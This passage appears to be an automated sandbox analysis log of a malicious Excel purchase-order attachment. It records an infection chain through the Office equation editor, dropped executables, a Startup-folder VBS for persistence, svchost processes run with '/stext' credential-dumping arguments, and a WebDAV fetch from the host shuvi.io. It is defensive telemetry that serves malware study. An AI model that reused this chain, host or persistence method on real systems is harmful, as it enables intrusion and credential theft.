                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_001B4FE9
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\68730000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA0B1.tmpJump to behavior
                Source: PO-00006799868.xlsOLE indicator, Workbook stream: true
                Source: 68730000.0.drOLE indicator, Workbook stream: true
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.1055411856.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.474748620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: PO-00006799868.xlsReversingLabs: Detection: 13%
                Source: PO-00006799868.xlsVirustotal: Detection: 14%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: PO-00006799868.xlsStatic file information: File size 1094656 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: wntdll.pdb source: name.exe, 0000000B.00000003.456762758.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.456458647.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485897066.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485739921.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp
                Source: 68730000.0.drInitial sample: OLE indicators vbamacros = False
                Source: PO-00006799868.xlsInitial sample: OLE indicators encrypted = True
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022C104 LoadLibraryA,GetProcAddress,10_2_0022C104
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0065FA2C push 00000045h; ret 9_2_0065FA33
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0066C301 pushad ; ret 9_2_0066C339
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0066C789 push esp; ret 9_2_0066C795
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE20A push esi; retf 10_3_02ADE20D
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE6C2 push 7E000BC3h; ret 10_3_02ADE6D1
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE7F2 push cs; ret 10_3_02ADE8CD
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE4C8 push ss; iretd 10_3_02ADE581
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE596 push ss; iretd 10_3_02ADE581
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE8E8 push cs; ret 10_3_02ADE8CD
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE8E4 pushfd ; retn 000Bh10_3_02ADE8E5
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE8F4 push eax; retn 000Bh10_3_02ADE8F5
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ADE900 push ds; retn 000Bh10_3_02ADE945
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A5B988 push eax; retn 0040h10_3_02A5B999
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A77EC5 push ecx; ret 10_3_02A77ED8
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001BC590 push eax; retn 001Bh10_2_001BC599
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001D8AC5 push ecx; ret 10_2_001D8AD8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01288AC5 push ecx; ret 11_2_01288AD8

                Persistence and Installation Behavior

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\shuvi.io@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\shuvi.io@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 96632497.doc.4.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\taskhostw.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_001B4A35
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01264A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_01264A35
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012E53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_012E53DF
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001D3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_001D3307
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
